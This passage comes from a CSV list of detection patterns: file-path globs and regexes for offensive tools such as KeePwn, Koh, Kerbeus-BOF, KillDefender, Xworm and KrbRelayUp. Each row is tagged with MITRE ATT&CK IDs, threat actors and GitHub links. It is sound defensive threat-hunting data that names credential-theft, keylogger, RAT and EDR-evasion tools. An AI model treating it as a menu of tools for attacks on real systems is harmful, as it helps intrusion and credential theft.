Access","https://github.com/Orange-Cyberdefense/KeePwn","1","0","N/A","10","5","418","35","2024-04-19T13:37:16Z","2023-01-27T13:59:38Z" "*\KeePwn\keepwn\*",".{0,1000}\\KeePwn\\keepwn\\.{0,1000}","offensive_tool_keyword","KeePwn","A python tool to automate KeePass discovery and secret extraction","T1555 - T1003 - T1114","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Orange-Cyberdefense/KeePwn","1","0","N/A","10","5","418","35","2024-04-19T13:37:16Z","2023-01-27T13:59:38Z" "*\KeePwn-0.3\*",".{0,1000}\\KeePwn\-0\.3\\.{0,1000}","offensive_tool_keyword","KeePwn","A python tool to automate KeePass discovery and secret extraction","T1555 - T1003 - T1114","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Orange-Cyberdefense/KeePwn","1","0","N/A","10","5","418","35","2024-04-19T13:37:16Z","2023-01-27T13:59:38Z" "*\KeePwn-main\*",".{0,1000}\\KeePwn\-main\\.{0,1000}","offensive_tool_keyword","KeePwn","A python tool to automate KeePass discovery and secret extraction","T1555 - T1003 - T1114","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Orange-Cyberdefense/KeePwn","1","0","N/A","10","5","418","35","2024-04-19T13:37:16Z","2023-01-27T13:59:38Z" "*\KeeTheft.exe*",".{0,1000}\\KeeTheft\.exe.{0,1000}","offensive_tool_keyword","KeeThiefSyscalls","Patch GhostPack/KeeThief for it to use DInvoke and syscalls","T1003.001 - T1558.002","TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/Metro-Holografix/KeeThiefSyscalls","1","0","private github repo","10","N/A","N/A","N/A","N/A","N/A" "*\kekeo.exe*",".{0,1000}\\kekeo\.exe.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1583 T1595 T1190","N/A","N/A","N/A","POST Exploitation tools","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","0","N/A","N/A","10","8342","2385","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z" "*\kerberoast.c*",".{0,1000}\\kerberoast\.c.{0,1000}","offensive_tool_keyword","nanorobeus","COFF file (BOF) for managing Kerberos tickets.","T1558.003 - T1208","TA0006 - TA0007","N/A","N/A","C2","https://github.com/wavvs/nanorobeus","1","0","N/A","10","10","273","31","2023-07-02T12:56:27Z","2022-07-04T00:33:30Z" "*\kerberoast.c*",".{0,1000}\\kerberoast\.c.{0,1000}","offensive_tool_keyword","nanorobeus","COFF file (BOF) for managing Kerberos tickets.","T1558.003 - T1208","TA0006 - TA0007","N/A","N/A","C2","https://github.com/wavvs/nanorobeus","1","0","N/A","10","10","273","31","2023-07-02T12:56:27Z","2022-07-04T00:33:30Z" "*\kerberoastables.txt*",".{0,1000}\\kerberoastables\.txt.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tools","https://github.com/Orange-Cyberdefense/arsenal","1","0","commands cheat sheets","8","10","N/A","N/A","N/A","N/A" "*\kerberoasting.c*",".{0,1000}\\kerberoasting\.c.{0,1000}","offensive_tool_keyword","cobaltstrike","BOF for Kerberos abuse (an implementation of some important features of the Rubeus)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/RalfHacker/Kerbeus-BOF","1","0","N/A","10","10","321","32","2023-11-20T17:30:34Z","2023-11-20T10:01:36Z" "*\KerberOPSEC.cs*",".{0,1000}\\KerberOPSEC\.cs.{0,1000}","offensive_tool_keyword","KerberOPSEC","OPSEC safe Kerberoasting in C#","T1558.003","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/Luct0r/KerberOPSEC","1","0","N/A","10","2","185","22","2022-06-14T18:10:25Z","2022-01-07T17:20:40Z" "*\KerberOPSEC.sln*",".{0,1000}\\KerberOPSEC\.sln.{0,1000}","offensive_tool_keyword","KerberOPSEC","OPSEC safe Kerberoasting in C#","T1558.003","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/Luct0r/KerberOPSEC","1","0","N/A","10","2","185","22","2022-06-14T18:10:25Z","2022-01-07T17:20:40Z" "*\Kerbeus-BOF\*",".{0,1000}\\Kerbeus\-BOF\\.{0,1000}","offensive_tool_keyword","cobaltstrike","BOF for Kerberos abuse (an implementation of some important features of the Rubeus)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/RalfHacker/Kerbeus-BOF","1","0","N/A","10","10","321","32","2023-11-20T17:30:34Z","2023-11-20T10:01:36Z" "*\kerbrute.py*",".{0,1000}\\kerbrute\.py.{0,1000}","offensive_tool_keyword","kerbrute","A tool to perform Kerberos pre-auth bruteforcing","T1110.003 - T1558.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/ropnop/kerbrute","1","0","N/A","10","10","2415","394","2024-02-22T11:37:57Z","2019-02-03T18:21:17Z" "*\KernelTokens.sys*",".{0,1000}\\KernelTokens\.sys.{0,1000}","offensive_tool_keyword","Tokenvator","A tool to elevate privilege with Windows Tokens","T1134 - T1078","TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/0xbadjuju/Tokenvator","1","0","N/A","N/A","10","1005","200","2023-10-06T13:17:05Z","2017-12-08T01:29:11Z" "*\KExecDD-main*",".{0,1000}\\KExecDD\-main.{0,1000}","offensive_tool_keyword","KExecDD","Admin to Kernel code execution using the KSecDD driver","T1068 - T1055.011","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/floesen/KExecDD","1","0","N/A","8","2","172","27","2024-04-19T09:58:14Z","2024-04-19T08:54:49Z" "*\KeyDump.log*",".{0,1000}\\KeyDump\.log.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*\KeyDump.log*",".{0,1000}\\KeyDump\.log.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*\keyLogger.cs*",".{0,1000}\\keyLogger\.cs.{0,1000}","offensive_tool_keyword","xeno-rat","Xeno-RAT is an open-source remote access tool (RAT) developed in C# providing a comprehensive set of features for remote system management. Has features such as HVNC - live microphone - reverse proxy and much much more","T1133 - T1021.001 - T1563.002 - T1113 - T1123 - T1571 - T1090","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011","N/A","N/A","C2","https://github.com/moom825/xeno-rat","1","0","N/A","10","10","679","210","2024-03-05T06:22:36Z","2023-10-17T06:41:56Z" "*\Keylogger.dll*",".{0,1000}\\Keylogger\.dll.{0,1000}","offensive_tool_keyword","Xworm","Malware with wide range of capabilities ranging from RAT to ransomware","T1562 - T1547 - T1056 - T1125 - T1496 - T1486 - T1219 - T1567 - T1564 - T1027","TA0005 - TA0003 - TA0009 - TA0040 - TA0002 - TA0006 - TA0010 - TA0004 - TA0007 - TA0008 - TA0011","N/A","N/A","C2 - Malware","https://github.com/guessthatname99/XWorm-RAT-V2.1","1","0","N/A","10","10","22","3","2024-03-21T17:40:39Z","2024-01-31T23:40:16Z" "*\Keylogger.ps1*",".{0,1000}\\Keylogger\.ps1.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1583 T1595 T1190","N/A","N/A","N/A","POST Exploitation tools","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","0","N/A","N/A","10","8342","2385","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z" "*\Keylogger.txt*",".{0,1000}\\Keylogger\.txt.{0,1000}","offensive_tool_keyword","EvilnoVNC","EvilnoVNC is a Ready to go Phishing Platform","T1566 - T1566.001 - T1071 - T1071.001","TA0043 - TA0001","N/A","N/A","Phishing","https://github.com/JoelGMSec/EvilnoVNC","1","0","N/A","9","8","717","126","2024-03-21T10:05:50Z","2022-09-04T10:48:49Z" "*\KeyLoggerOffline.*",".{0,1000}\\KeyLoggerOffline\..{0,1000}","offensive_tool_keyword","xeno-rat","Xeno-RAT is an open-source remote access tool (RAT) developed in C# providing a comprehensive set of features for remote system management. Has features such as HVNC - live microphone - reverse proxy and much much more","T1133 - T1021.001 - T1563.002 - T1113 - T1123 - T1571 - T1090","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011","N/A","N/A","C2","https://github.com/moom825/xeno-rat","1","0","N/A","10","10","679","210","2024-03-05T06:22:36Z","2023-10-17T06:41:56Z" "*\KidLogger\*",".{0,1000}\\KidLogger\\.{0,1000}","offensive_tool_keyword","kiglogger","malware parental control software - keylogger","T1056.001 - T1113 - T1056.004","TA0006 - TA0009","N/A","N/A","Collection","https://kidlogger.net/download.html","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*\KidLogger_is1*",".{0,1000}\\KidLogger_is1.{0,1000}","offensive_tool_keyword","kiglogger","malware parental control software - keylogger","T1056.001 - T1113 - T1056.004","TA0006 - TA0009","N/A","N/A","Collection","https://kidlogger.net/download.html","1","0","registry","10","10","N/A","N/A","N/A","N/A" "*\KillDefender.c*",".{0,1000}\\KillDefender\.c.{0,1000}","offensive_tool_keyword","KillDefenderBOF","KillDefenderBOF is a Beacon Object File PoC implementation of pwn1sher/KillDefender - kill defender","T1055.002 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/Cerbersec/KillDefenderBOF","1","0","N/A","10","3","208","30","2022-04-12T17:45:50Z","2022-02-06T21:59:03Z" "*\KillDefender.o*",".{0,1000}\\KillDefender\.o.{0,1000}","offensive_tool_keyword","KillDefenderBOF","KillDefenderBOF is a Beacon Object File PoC implementation of pwn1sher/KillDefender - kill defender","T1055.002 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/Cerbersec/KillDefenderBOF","1","0","N/A","10","3","208","30","2022-04-12T17:45:50Z","2022-02-06T21:59:03Z" "*\killer.cpp*",".{0,1000}\\killer\.cpp.{0,1000}","offensive_tool_keyword","killer","evade AVs and EDRs or security tools","T1564 - T1027 - T1070","TA0005","N/A","N/A","Defense Evasion","https://github.com/0xHossam/Killer","1","0","N/A","10","7","N/A","N/A","N/A","N/A" "*\killer.exe*",".{0,1000}\\killer\.exe.{0,1000}","offensive_tool_keyword","killer","evade AVs and EDRs or security tools","T1564 - T1027 - T1070","TA0005","N/A","N/A","Defense Evasion","https://github.com/0xHossam/Killer","1","0","N/A","10","7","N/A","N/A","N/A","N/A" "*\KillWindows.dll*",".{0,1000}\\KillWindows\.dll.{0,1000}","offensive_tool_keyword","Xworm","Malware with wide range of capabilities ranging from RAT to ransomware","T1562 - T1547 - T1056 - T1125 - T1496 - T1486 - T1219 - T1567 - T1564 - T1027","TA0005 - TA0003 - TA0009 - TA0040 - TA0002 - TA0006 - TA0010 - TA0004 - TA0007 - TA0008 - TA0011","N/A","N/A","C2 - Malware","https://github.com/guessthatname99/XWorm-RAT-V2.1","1","0","N/A","10","10","22","3","2024-03-21T17:40:39Z","2024-01-31T23:40:16Z" "*\KillWindows.pdb*",".{0,1000}\\KillWindows\.pdb.{0,1000}","offensive_tool_keyword","Xworm","Malware with wide range of capabilities ranging from RAT to ransomware","T1562 - T1547 - T1056 - T1125 - T1496 - T1486 - T1219 - T1567 - T1564 - T1027","TA0005 - TA0003 - TA0009 - TA0040 - TA0002 - TA0006 - TA0010 - TA0004 - TA0007 - TA0008 - TA0011","N/A","N/A","C2 - Malware","https://github.com/guessthatname99/XWorm-RAT-V2.1","1","0","N/A","10","10","22","3","2024-03-21T17:40:39Z","2024-01-31T23:40:16Z" "*\Kirby.ps1*",".{0,1000}\\Kirby\.ps1.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","POST Exploitation tools","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","10","7","661","80","2024-05-01T18:39:44Z","2023-06-20T16:57:27Z" "*\Kirby.ps1*",".{0,1000}\\Kirby\.ps1.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","POST Exploitation tools","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","10","7","661","80","2024-05-01T18:39:44Z","2023-06-20T16:57:27Z" "*\kitten.exe*",".{0,1000}\\kitten\.exe.{0,1000}","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","0","N/A","10","10","202","39","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z" "*\KittyStager*",".{0,1000}\\KittyStager.{0,1000}","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","0","N/A","10","10","202","39","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z" "*\Koh.exe*",".{0,1000}\\Koh\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","Koh is a C# and Beacon Object File (BOF) toolset that allows for the capture of user credential material via purposeful token/logon session leakage.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/GhostPack/Koh","1","0","N/A","10","10","473","63","2022-07-13T23:41:38Z","2022-07-07T17:14:09Z" "*\Koh.pdb*",".{0,1000}\\Koh\.pdb.{0,1000}","offensive_tool_keyword","cobaltstrike","Koh is a C# and Beacon Object File (BOF) toolset that allows for the capture of user credential material via purposeful token/logon session leakage.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/GhostPack/Koh","1","0","N/A","10","10","473","63","2022-07-13T23:41:38Z","2022-07-07T17:14:09Z" "*\Koh\Koh.*",".{0,1000}\\Koh\\Koh\..{0,1000}","offensive_tool_keyword","cobaltstrike","Koh is a C# and Beacon Object File (BOF) toolset that allows for the capture of user credential material via purposeful token/logon session leakage.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/GhostPack/Koh","1","0","N/A","10","10","473","63","2022-07-13T23:41:38Z","2022-07-07T17:14:09Z" "*\Koppeling.sln*",".{0,1000}\\Koppeling\.sln.{0,1000}","offensive_tool_keyword","Koppeling","Adaptive DLL hijacking / dynamic export forwarding","T1574.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/monoxgas/Koppeling","1","0","N/A","8","7","686","119","2020-07-06T14:47:57Z","2020-02-18T21:08:16Z" "*\KPortScan 3.0\*",".{0,1000}\\KPortScan\s3\.0\\.{0,1000}","offensive_tool_keyword","KPortScan","port scanner used by attackers","T1046 - T1595","TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/stardust50578/rdp_brute","1","0","N/A","8","1","3","6","2019-05-19T14:25:06Z","2019-05-19T14:29:49Z" "*\KPortScan\*",".{0,1000}\\KPortScan\\.{0,1000}","offensive_tool_keyword","KPortScan","port scanner used by attackers","T1046 - T1595","TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/stardust50578/rdp_brute","1","0","N/A","8","1","3","6","2019-05-19T14:25:06Z","2019-05-19T14:29:49Z" "*\krb5\*.py",".{0,1000}\\krb5\\.{0,1000}\.py","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*\KrbRelay.exe*",".{0,1000}\\KrbRelay\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*\KrbRelayUp.exe*",".{0,1000}\\KrbRelayUp\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*\KrbRelayUp.lib*",".{0,1000}\\KrbRelayUp\.lib.{0,1000}","offensive_tool_keyword","KrbRelayUp","a universal no-fix local privilege escalation in windows domain environments where LDAP signing is not enforced (the default settings).","T1558 - T1210","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/Dec0ne/KrbRelayUp","1","0","N/A","10","10","1456","193","2022-08-06T12:23:58Z","2022-04-24T21:33:00Z" "*\KrbSCM.cs*",".{0,1000}\\KrbSCM\.cs.{0,1000}","offensive_tool_keyword","KrbRelayUp","a universal no-fix local privilege escalation in windows domain environments where LDAP signing is not enforced (the default settings).","T1558 - T1210","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/Dec0ne/KrbRelayUp","1","0","N/A","10","10","1456","193","2022-08-06T12:23:58Z","2022-04-24T21:33:00Z" "*\KRBUACBypass*",".{0,1000}\\KRBUACBypass.{0,1000}","offensive_tool_keyword","KRBUACBypass","UAC Bypass By Abusing Kerberos Tickets","T1548.002 - T1558 - T1558.003","TA0004 - TA0006","N/A","N/A","Defense Evasion","https://github.com/wh0amitz/KRBUACBypass","1","0","N/A","8","5","444","60","2023-08-10T02:51:59Z","2023-07-27T12:08:12Z" "*\kuhl_m_sekurlsa.c*",".{0,1000}\\kuhl_m_sekurlsa\.c.{0,1000}","offensive_tool_keyword","DragonCastle","A PoC that combines AutodialDLL Lateral Movement technique and SSP to scrape NTLM hashes from LSASS process.","T1003 - T1547.005 - T1055 - T1557","TA0008 - TA0006","N/A","N/A","Credential Access","https://github.com/mdsecactivebreach/DragonCastle","1","0","N/A","10","3","291","34","2022-10-26T10:19:55Z","2022-10-26T10:18:37Z" "*\Ladon.exe*",".{0,1000}\\Ladon\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4595","855","2023-12-19T15:05:38Z","2019-11-02T06:22:41Z" "*\Ladon.ps1*",".{0,1000}\\Ladon\.ps1.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4595","855","2023-12-19T15:05:38Z","2019-11-02T06:22:41Z" "*\laps.py*",".{0,1000}\\laps\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate 